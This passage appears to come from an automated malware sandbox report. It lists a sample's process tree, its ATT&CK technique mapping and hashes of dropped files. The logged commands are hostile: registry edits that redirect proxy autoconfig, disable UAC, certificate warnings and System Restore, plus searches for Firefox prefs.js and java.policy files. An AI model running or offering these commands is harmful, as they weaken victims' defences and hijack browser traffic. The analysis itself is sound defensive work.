      PID:2324
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2508
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "AutoConfigUrl" /d "file://C:\Users\Admin\AppData\Local\Temp/ODZKDRGV.txt" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2728
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4852
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableHttp1_1" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3748
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyEnable" /t reg_dword /d 00000000 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2276
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4644
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "ProxyHttp1.1" /t reg_dword /d 00000000 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4340
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1520
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "Autoconfig" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1728
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4040
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "AdvancedTab" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1548
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4544
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel" /v "ResetWebSettings" /t reg_dword /d 00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4560
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 00000000 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      PID:1448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1152
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4788
    - - C:\Windows\SysWOW64\find.exe
        
        find "prefs.js"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4360
  - - C:\Windows\SysWOW64\attrib.exe
      attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js "
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4468
  - - C:\Windows\SysWOW64\attrib.exe
      attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js "
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:916
  - - C:\Windows\SysWOW64\attrib.exe
      attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js "
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2964
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp
      4⤵
      System Location Discovery: System Language Discovery
      PID:3244
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2044
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "Internet Explorer\Main"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1092
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3340
    - - C:\Windows\SysWOW64\find.exe
        
        C:\Windows\system32\find.exe "S-1-5-21"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1560
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3692
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1336
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2988
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKU\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1096
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c dir /b /s | find /i "java.policy"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4912
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" dir /b /s "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2416
    - - C:\Windows\SysWOW64\find.exe
        
        find /i "java.policy"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4204

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
3581a0e6b4a2481b0d17c98cea4c6ba1

SHA1
f55e51abdb6324ae363802235297914a053947ec

SHA256
a904ea3ed03f1568aaea366c859b6f0610d0e47ccd5725c20132d3c10e11188d

SHA512
f9ea3d2712ca7ebb9c5826de7a89c59c7b2a50759baa83cf04fce4234d59e94d251560ab9e3bb845715ce54bc65187297eac9f73ad93adf034bca591cab3ab24

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
5865fd3da82e35ce96a02b941a533033

SHA1
44d0b19fb1475bd50d25f3eaa3a1b71f85c94030

SHA256
987dac20b799d497cd3d4eba2af4d7b0b126b472d93335ae4ac98bb76a5297ad

SHA512
30d97e38836ba0660537de15f0089c603527055471fadacb3bafbac6a5487b1a1f87894c58a2668e3dc5b01c4211b4986e99f2f3e54e97d1ab4555d168fc0fb8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\G40JFEW9\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\F78F.tmp\jp.bat

Filesize
7KB

MD5
01b59ab011db2ca3948a0946f3b663dd

SHA1
8b97d0c68c79c1ecf77808232a2c22bf1fbd435f

SHA256
e288630343877f6d87db620ffea9457a461f245e6d2ec4a3d57ca8da2855a9f8

SHA512
862b55f5d721f35196476ef9585981db2570fda942d8e7f6d22cb3875c5786257624a2e6c096e6f2f5b6a8154b198dfe0d72c3437924ea09c4f29fe2eab24c50

Download Submit
C:\Users\Admin\AppData\Local\Temp\REGFF6E.tmp

Filesize
16.8MB

MD5
05bee4d034368dd0c736fc4d7707c50a

SHA1
7d91e86110f80448552a70e9de91bdda0dad0bc1

SHA256
d588a4ad958acd74bd384d0e3f219feb600201d77c57e93aecda7f42124c2e7d

SHA512
e4d239b8552ef6059730980960396389d7d05c92fd8dd64d5989f7e99bc72c73bf06d617117e373411a034bc62e0d7d0558a89f9a11d5e41d35ec81d4c66f6aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\jp.exe

Filesize
23KB

MD5
192ea991829450ece3ab1538cf2fb59c

SHA1
4f4d8fffd42a55048be8ee1490806dd5af4a1bd9

SHA256
ae18c7771c459b5b41e44167996bde66c51e4059477af579a4ae4e16e02ad3d5

SHA512
5ce59338d150732cb970c7e09c1f28e3581632a63560afcb994b73d6c17a40b31b244f631d7bd2b84f1c49ddb4142b4a9186a5c639198efac43e097292199230

Download Submit
C:\Users\Admin\AppData\Local\Temp\~i.tmp

Filesize
742B

MD5
db5da4269bcca49299e6a778e84d8c95

SHA1
b23823bd94581d1005b3c72db58cdfc8aae33808

SHA256
40914a7aa2736fae5e7b04ec2befc699be6de412c092cc979aa63cabce3bb8e0

SHA512
1ce7491b91f1d7b291bc4461fef1d701501ddc6d2158238f4efe6a7187937fb324d97fb958621b33136f0ef80256a939db10870285cab81f9c4e0d5069990914

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js

Filesize
11KB

MD5
e599add601cca354fabc6f8e3d386aa4

SHA1
a72c5964727df45b5de3eacb225e7addf7a6c851

SHA256
e11735d7dd10a7001d70264ba6d30d13eb7b35ada6709bad7e0f0e86e2dd8e92

SHA512
99b70f5bc4acc680e2081ad0956543b96019d41d5085ef1e6e34cd5c290bc5711a014c82418e3870ef203c53211e2ec849b88aa021665b99ca109f0a66e38bb9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\fz3nlbuq.default-release\prefs.js

Filesize
11KB

MD5
50815cd7b98c0e20c35aab5cd3917510

SHA1
bfaf2caba9c0bb54ca766a69547fccf98dee76ed

SHA256
82ee7bdc90587d0c5577c8417ce2139574135ab1dd2b1fab2f085ae61d5a6b28

SHA512
337284962dbbc944961d97dfa3ed8dcf26571745d4f3297fca0c929367e4eff98ced25e95861a464d21702b041db8e37755e888f34f8ccf38c71b20028e8fa64

Download Submit
memory/3908-8-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/3908-28-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/3908-47-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads